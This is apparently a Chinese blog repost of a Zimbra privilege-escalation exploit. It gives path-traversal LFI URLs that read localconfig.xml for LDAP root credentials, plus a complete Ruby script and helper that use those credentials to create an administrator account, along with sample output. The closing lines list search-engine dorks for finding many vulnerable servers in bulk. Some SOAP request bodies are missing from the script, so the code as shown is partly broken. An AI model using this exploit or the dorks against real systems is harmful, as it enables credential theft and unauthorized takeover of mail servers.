Zimbra 0day exploit / Privilegie escalation via LFI

from:http://www.exploit-db.com/exploits/30085/ 影响版本:2009, 2010, 2011, 2012 and early 2013 测试方法: [php] http://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00[/php] [php]https://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00[/php] [php] ----------------Exploit----------------- Before use this exploit, target server must have admin console port open "7071" otherwise it won't work. use the exploit like this : ruby run.rb -t mail.example.com -u someuser -p Test123_23 [*] Looking if host is vuln.... [+] Host is vuln exploiting... [+] Obtaining Domain Name [+] Creating Account [+] Elevating Privileges [+] Login Credentials [*] Login URL : https://mail.example.com:7071/zimbraAdmin/ [*] Account : someuser@example.com [*] Password : Test123_23 [+] Successfully Exploited ! [/php] run.rb: [php] # /usr/bin/ruby # # Author: Eduardo Rubina H. # Email : rubina119[at]gmail.com # Date : 03 Dec 2013 # State : Critical # # Description : This script exploits a Local File Inclusion in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz which allows us to see localconfig.xml # that contains LDAP root credentials wich allow us to make requests in /service/admin/soap API with the stolen LDAP credentials to create user with administration privlegies # and a lot of stuff also the lfi leets you see .bash_history, ssh pub keys, config files, etc. # # # LFI : /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 # # require 'net/https' require 'getoptlong' require './ultils.rb' data = nil def exploit_begin() puts "[+] Looking if host is vuln..." http = Net::HTTP.new( $host, 7071 ) http.use_ssl = true http.verify_mode = OpenSSL::SSL::VERIFY_NONE req = Net::HTTP::Get.new( "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00", { "Accept-Encoding" => "gzip", "User-Agent" => "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" } ) res = http.request( req ) case res when Net::HTTPSuccess then begin if res.header[ 'Content-Encoding' ].eql?( 'gzip' ) then sio = StringIO.new( res.body ) gz = Zlib::GzipReader.new( sio ) puts "[+] Host is vuln exploiting" resbody = gz.read() part1 = resbody.gsub("\n", ' ').squeeze(' ') part2 = part1.gsub("a[", '').squeeze(' ') ldap_user = part2.match(/name=\\"zimbra_user\\">"; "(.*?)<\/value>/ui)[1] ldap_pass = part2.match(/name=\\"zimbra_ldap_password\\">"; "(.*?)<\/value>/ui)[1] get_auth_token(ldap_user,ldap_pass) else puts "[-] Host is not vulnerable !" return false end rescue Exception #puts "[-] Connection Failed !" return false end end end def get_auth_token(user,pass) https = Net::HTTP.new( $host, 7071 ) path = "/service/admin/soap" https.use_ssl = true https.verify_mode = OpenSSL::SSL::VERIFY_NONE body = " #{user}#{pass}" data = https.post(path, body, { "Content-Type" => "application/soap+xml; charset=utf-8; action=\"urn:zimbraAdmin#AuthRequest\"" } ) $auth_key = data.body.match(/(.*)<\/authToken>/iu)[1] exploit() end def exploit() puts "[+] Obtaining Domain Name" get_domain_soap_data = "" get_domain = Utils.new.request_soap_admin(get_domain_soap_data) domain = get_domain.match(/(.*?)<\/a>/iu)[1] puts "[+] Creating Account" create_account_soap_data = "#{$user}@#{domain}#{$password}" create_account = Utils.new.request_soap_admin(create_account_soap_data) a_id = create_account.match(/account id="(.*)" name="/ui)[1] puts "[+] Elevating Privileges" elevate_privs_soap_data = "#{a_id}TRUE" elevate_privs = Utils.new.request_soap_admin(elevate_privs_soap_data) puts "[+] Login Credentials" puts " [*] Login URL : https://#{domain}:7071/zimbraAdmin/ " puts " [*] Account : #{$user}@#{domain}" puts " [*] Password : #{$password}" puts "[+] Successfully Exploited !" end def usage print( " -t, --target Host to attack ip or domain -u, --useraccount The user name to be used to create the account, only alfanumeric chars. -p, --password Password that will be used to create the account, pass needs to be alfanumeric upercase and lowercase and special chars, minchar(8). -h, --help Print this help message " ) end puts "" puts "" puts "#########################################################################################" puts "Zimbra Email Collaboration Server 0day Exploit by rubina119" puts "#########################################################################################" puts "" puts "" opts = GetoptLong.new( [ '--target', '-t', GetoptLong::REQUIRED_ARGUMENT ], [ '--useraccount','-u', GetoptLong::REQUIRED_ARGUMENT ], [ '--password','-p', GetoptLong::REQUIRED_ARGUMENT ], [ '--help','-h', GetoptLong::OPTIONAL_ARGUMENT ] ) opts.each do |opt, arg| case opt when '--help' usage() when '--target' $host = arg when '--useraccount' $user = arg when '--password' $password = arg end end if $host == nil usage() else exploit_begin() end [/php] ultils.rb [php] # /usr/bin/ruby require 'net/https' class Utils def request_soap_admin(api_call) @request=api_call soap_client = Net::HTTP.new( $host, 7071 ) soap_client.use_ssl = true soap_client.verify_mode = OpenSSL::SSL::VERIFY_NONE soap_path = "/service/admin/soap" soap_data = "#{$auth_key}#{@request}" response = soap_client.post(soap_path, soap_data, { "Content-Type" => "application/soap+xml; charset=utf-8; action=\"urn:zimbraAdmin\"" } ) if response.body.match(/Error/) error_res = response.body.match(/(.*?)<\/soap:Text>/ui)[1] puts "[-] Response Error" puts " [*] #{error_res}" false else return response.body end end end[/php] 批量搜索方法:title:zimbra web client sign in (百度下测试一搜索一大片) inurl:7071 -intext:7071 inurl:zimbra inurl:7071 intitle:zimbra administration 虽然有些没开7071但是配置文件还是能被包含出来,不知道里面加密的数据能不能被破解出来

发表评论